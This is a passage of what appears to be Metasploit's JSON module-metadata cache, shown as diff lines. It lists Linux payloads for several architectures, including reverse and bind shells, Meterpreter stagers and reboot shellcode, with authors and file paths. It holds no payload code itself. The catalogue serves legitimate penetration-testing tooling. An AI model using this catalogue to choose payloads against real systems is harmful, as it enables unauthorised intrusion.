"description": "Spawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "mipsbe", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/mipsbe/reverse_tcp.rb", + 
"is_install_path": true, + "ref_name": "linux/mipsbe/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/mipsbe/shell", + "stager_refname": "linux/mipsbe/reverse_tcp" + }, + "payload_linux/mipsbe/shell_bind_tcp": { + "name": "Linux Command Shell, Bind TCP Inline", + "fullname": "payload/linux/mipsbe/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "scut", + "vaicebine", + "Vlatko Kosturjak", + "juan vazquez " + ], + "description": "Listen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "mipsbe", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/mipsbe/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "linux/mipsbe/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/mipsbe/shell_reverse_tcp": { + "name": "Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/linux/mipsbe/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "rigan ", + "juan vazquez " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [ + "EDB-18226" + ], + "platform": "Linux", + "arch": "mipsbe", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/mipsbe/shell_reverse_tcp", + "check": false, + 
"post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/mipsle/exec": { + "name": "Linux Execute Command", + "fullname": "payload/linux/mipsle/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Michael Messner ", + "entropy " + ], + "description": "A very small shellcode for executing commands.\n This module is sometimes helpful for testing purposes as well as\n on targets with extremely limited buffer space.", + "references": [ + "EDB-17940" + ], + "platform": "Linux", + "arch": "mipsle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/mipsle/exec.rb", + "is_install_path": true, + "ref_name": "linux/mipsle/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/mipsle/meterpreter/reverse_tcp": { + "name": "Linux Meterpreter, Reverse TCP Stager", + "fullname": "payload/linux/mipsle/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "juan vazquez ", + "tkmru" + ], + "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "mipsle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/mipsle/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": 
false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/mipsle/meterpreter", + "stager_refname": "linux/mipsle/reverse_tcp" + }, + "payload_linux/mipsle/meterpreter_reverse_http": { + "name": "Linux Meterpreter, Reverse HTTP Inline", + "fullname": "payload/linux/mipsle/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "mipsle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "linux/mipsle/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/mipsle/meterpreter_reverse_https": { + "name": "Linux Meterpreter, Reverse HTTPS Inline", + "fullname": "payload/linux/mipsle/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "mipsle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb", + "is_install_path": true, + "ref_name": "linux/mipsle/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + 
"staged": false + }, + "payload_linux/mipsle/meterpreter_reverse_tcp": { + "name": "Linux Meterpreter, Reverse TCP Inline", + "fullname": "payload/linux/mipsle/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "mipsle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/mipsle/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/mipsle/reboot": { + "name": "Linux Reboot", + "fullname": "payload/linux/mipsle/reboot", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Michael Messner ", + "rigan - " + ], + "description": "A very small shellcode for rebooting the system.\n This payload is sometimes helpful for testing purposes.", + "references": [ + "URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php" + ], + "platform": "Linux", + "arch": "mipsle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/mipsle/reboot.rb", + "is_install_path": true, + "ref_name": "linux/mipsle/reboot", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/mipsle/shell/reverse_tcp": { + "name": "Linux Command Shell, Reverse TCP Stager", + 
"fullname": "payload/linux/mipsle/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "juan vazquez ", + "tkmru" + ], + "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "mipsle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/linux/mipsle/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/mipsle/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/mipsle/shell", + "stager_refname": "linux/mipsle/reverse_tcp" + }, + "payload_linux/mipsle/shell_bind_tcp": { + "name": "Linux Command Shell, Bind TCP Inline", + "fullname": "payload/linux/mipsle/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "scut", + "vaicebine", + "Vlatko Kosturjak", + "juan vazquez " + ], + "description": "Listen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "mipsle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "linux/mipsle/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/mipsle/shell_reverse_tcp": { + "name": "Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/linux/mipsle/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + 
"type": "payload", + "author": [ + "rigan ", + "juan vazquez " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "mipsle", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/mipsle/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/ppc/meterpreter_reverse_http": { + "name": "Linux Meterpreter, Reverse HTTP Inline", + "fullname": "payload/linux/ppc/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "ppc", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "linux/ppc/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/ppc/meterpreter_reverse_https": { + "name": "Linux Meterpreter, Reverse HTTPS Inline", + "fullname": "payload/linux/ppc/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + 
"platform": "Linux", + "arch": "ppc", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb", + "is_install_path": true, + "ref_name": "linux/ppc/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/ppc/meterpreter_reverse_tcp": { + "name": "Linux Meterpreter, Reverse TCP Inline", + "fullname": "payload/linux/ppc/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "ppc", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/ppc/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/ppc/shell_bind_tcp": { + "name": "Linux Command Shell, Bind TCP Inline", + "fullname": "payload/linux/ppc/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Listen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "ppc, cbea", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": 
"/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "linux/ppc/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/ppc/shell_find_port": { + "name": "Linux Command Shell, Find Port Inline", + "fullname": "payload/linux/ppc/shell_find_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Spawn a shell on an established connection", + "references": [], + "platform": "Linux", + "arch": "ppc, cbea", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/ppc/shell_find_port.rb", + "is_install_path": true, + "ref_name": "linux/ppc/shell_find_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/ppc/shell_reverse_tcp": { + "name": "Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/linux/ppc/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "ppc, cbea", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/ppc/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + 
"payload_type": 1, + "staged": false + }, + "payload_linux/ppc64/shell_bind_tcp": { + "name": "Linux Command Shell, Bind TCP Inline", + "fullname": "payload/linux/ppc64/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Listen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "ppc64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "linux/ppc64/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/ppc64/shell_find_port": { + "name": "Linux Command Shell, Find Port Inline", + "fullname": "payload/linux/ppc64/shell_find_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ramon de C Valle " + ], + "description": "Spawn a shell on an established connection", + "references": [], + "platform": "Linux", + "arch": "ppc64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/ppc64/shell_find_port.rb", + "is_install_path": true, + "ref_name": "linux/ppc64/shell_find_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/ppc64/shell_reverse_tcp": { + "name": "Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/linux/ppc64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": 
[ + "Ramon de C Valle " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "ppc64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/ppc64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/ppc64le/meterpreter_reverse_http": { + "name": "Linux Meterpreter, Reverse HTTP Inline", + "fullname": "payload/linux/ppc64le/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "ppc64le", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "linux/ppc64le/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/ppc64le/meterpreter_reverse_https": { + "name": "Linux Meterpreter, Reverse HTTPS Inline", + "fullname": "payload/linux/ppc64le/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": 
"Linux", + "arch": "ppc64le", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb", + "is_install_path": true, + "ref_name": "linux/ppc64le/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/ppc64le/meterpreter_reverse_tcp": { + "name": "Linux Meterpreter, Reverse TCP Inline", + "fullname": "payload/linux/ppc64le/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "ppc64le", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/ppc64le/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/ppce500v2/meterpreter_reverse_http": { + "name": "Linux Meterpreter, Reverse HTTP Inline", + "fullname": "payload/linux/ppce500v2/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "ppce500v2", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": 
null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "linux/ppce500v2/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/ppce500v2/meterpreter_reverse_https": { + "name": "Linux Meterpreter, Reverse HTTPS Inline", + "fullname": "payload/linux/ppce500v2/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "ppce500v2", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb", + "is_install_path": true, + "ref_name": "linux/ppce500v2/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/ppce500v2/meterpreter_reverse_tcp": { + "name": "Linux Meterpreter, Reverse TCP Inline", + "fullname": "payload/linux/ppce500v2/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "ppce500v2", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": 
"/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/ppce500v2/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/riscv32le/exec": { + "name": "Linux Execute Command", + "fullname": "payload/linux/riscv32le/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "modexp", + "bcoles " + ], + "description": "Execute an arbitrary command", + "references": [ + "URL-https://modexp.wordpress.com/2022/05/02/shellcode-risc-v-linux/", + "URL-https://github.com/odzhan/shellcode/blob/master/os/linux/riscv64/cmd.s" + ], + "platform": "Linux", + "arch": "riscv32le", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-14 09:31:03 +0000", + "path": "/modules/payloads/singles/linux/riscv32le/exec.rb", + "is_install_path": true, + "ref_name": "linux/riscv32le/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/riscv32le/reboot": { + "name": "Linux Reboot", + "fullname": "payload/linux/riscv32le/reboot", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bcoles " + ], + "description": "A very small shellcode for rebooting the system using\n the reboot syscall. 
This payload is sometimes helpful\n for testing purposes.", + "references": [], + "platform": "Linux", + "arch": "riscv32le", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-14 09:31:03 +0000", + "path": "/modules/payloads/singles/linux/riscv32le/reboot.rb", + "is_install_path": true, + "ref_name": "linux/riscv32le/reboot", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/riscv64le/exec": { + "name": "Linux Execute Command", + "fullname": "payload/linux/riscv64le/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "modexp", + "bcoles " + ], + "description": "Execute an arbitrary command", + "references": [ + "URL-https://modexp.wordpress.com/2022/05/02/shellcode-risc-v-linux/", + "URL-https://github.com/odzhan/shellcode/blob/master/os/linux/riscv64/cmd.s" + ], + "platform": "Linux", + "arch": "riscv64le", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-14 09:31:03 +0000", + "path": "/modules/payloads/singles/linux/riscv64le/exec.rb", + "is_install_path": true, + "ref_name": "linux/riscv64le/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/riscv64le/reboot": { + "name": "Linux Reboot", + "fullname": "payload/linux/riscv64le/reboot", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "bcoles " + ], + "description": "A very small shellcode for rebooting the system using\n the reboot syscall. 
This payload is sometimes helpful\n for testing purposes.", + "references": [], + "platform": "Linux", + "arch": "riscv64le", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-14 09:31:03 +0000", + "path": "/modules/payloads/singles/linux/riscv64le/reboot.rb", + "is_install_path": true, + "ref_name": "linux/riscv64le/reboot", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x64/exec": { + "name": "Linux Execute Command", + "fullname": "payload/linux/x64/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "ricky", + "Geyslan G. Bem " + ], + "description": "Execute an arbitrary command or just a /bin/sh shell", + "references": [], + "platform": "Linux", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x64/exec.rb", + "is_install_path": true, + "ref_name": "linux/x64/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x64/meterpreter/bind_tcp": { + "name": "Linux Mettle x64, Bind TCP Stager", + "fullname": "payload/linux/x64/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brent Cook ", + "ricky" + ], + "description": "Inject the mettle server payload (staged).\n\nListen for a connection", + "references": [], + "platform": "Linux,Linux", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": 
"/modules/payloads/stagers/linux/x64/bind_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x64/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x64/meterpreter", + "stager_refname": "linux/x64/bind_tcp" + }, + "payload_linux/x64/meterpreter/reverse_sctp": { + "name": "Linux Mettle x64, Reverse SCTP Stager", + "fullname": "payload/linux/x64/meterpreter/reverse_sctp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brent Cook ", + "RageLtMan " + ], + "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-12-20 04:15:41 +0000", + "path": "/modules/payloads/stagers/linux/x64/reverse_sctp.rb", + "is_install_path": true, + "ref_name": "linux/x64/meterpreter/reverse_sctp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x64/meterpreter", + "stager_refname": "linux/x64/reverse_sctp" + }, + "payload_linux/x64/meterpreter/reverse_tcp": { + "name": "Linux Mettle x64, Reverse TCP Stager", + "fullname": "payload/linux/x64/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brent Cook ", + "ricky", + "tkmru" + ], + "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + 
"path": "/modules/payloads/stagers/linux/x64/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "linux/x64/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "linux/x64/meterpreter", + "stager_refname": "linux/x64/reverse_tcp" + }, + "payload_linux/x64/meterpreter_reverse_http": { + "name": "Linux Meterpreter, Reverse HTTP Inline", + "fullname": "payload/linux/x64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Run the Meterpreter / Mettle server payload (stageless)", + "references": [], + "platform": "Linux", + "arch": "x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb", + "is_install_path": true, + "ref_name": "linux/x64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_linux/x64/meterpreter_reverse_https": { + "name": "Linux Meterpreter, Reverse HTTPS Inline", + "fullname": "payload/linux/x64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Adam Cammack ", + "Brent Cook ", + 